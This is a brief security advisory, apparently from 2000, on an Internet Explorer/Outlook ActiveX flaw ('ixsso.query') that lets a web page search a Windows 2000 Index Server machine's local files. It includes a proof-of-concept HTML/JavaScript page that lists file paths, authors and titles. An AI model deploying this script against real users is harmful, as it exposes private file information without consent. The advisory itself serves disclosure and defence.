An issue with the "ixsso.query" ActiveX object causes Internet Explorer 5.x, Outlook, Outlook Express, and Windows 2000 with Microsoft Index Server to be vulnerable to unauthorized file searching. DEMONSTRATION Georgi Guninski made the following code available; --------indexserv1.html------------------------------------------- <INPUT TYPE="BUTTON" VALUE="Search" onclick="g(document.all.query.value)"> <INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename = *.txt')"> <SCRIPT> function g(q1) \{ qu=new ActiveXObject("ixsso.query"); qu.Catalog="System"; //qu.query="@contents name"; //qu.query="#filename .htm or name near test"; //qu.query='@filename = *.doc '; qu.query=q1; qu.Columns="filename, path, doctitle, doccomments, docauthor, size"; rs=qu.CreateRecordset("nonsequential"); //alert("Records: "+rs.RecordCount); doc=window.frames\[0\].document; doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+""); doc.writeln("<TABLE BORDER=2>"); doc.writeln("<TR><TD>Path</TD><TD>size</TD> &l;TD>DocAuthor</TD><TD>DocTitle</TD></TR>"); while (!rs.EOF) \{ doc.writeln("<TR><TD><A TARGET='_blank' HREF='file://"+rs("Path")+"'</A>"+rs("Path")+"</TD> <TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD> <TD>"+rs("DocTitle")+"</TD></TR>"); rs.MoveNext(); \} doc.writeln("</TABLE>"); \} //setTimeout("g()",1000); </SCRIPT> --------------------------------------------------------------------- VENDOR RESPONSE Georgi Guninski reported this issue to Microsoft on November 6, 2000. I contacted Microsoft as well and they are working on a patch. Unfortunately, Microsoft was only given four days to address the issue and has not completed the patch. CREDIT |
0 comments
Hide comments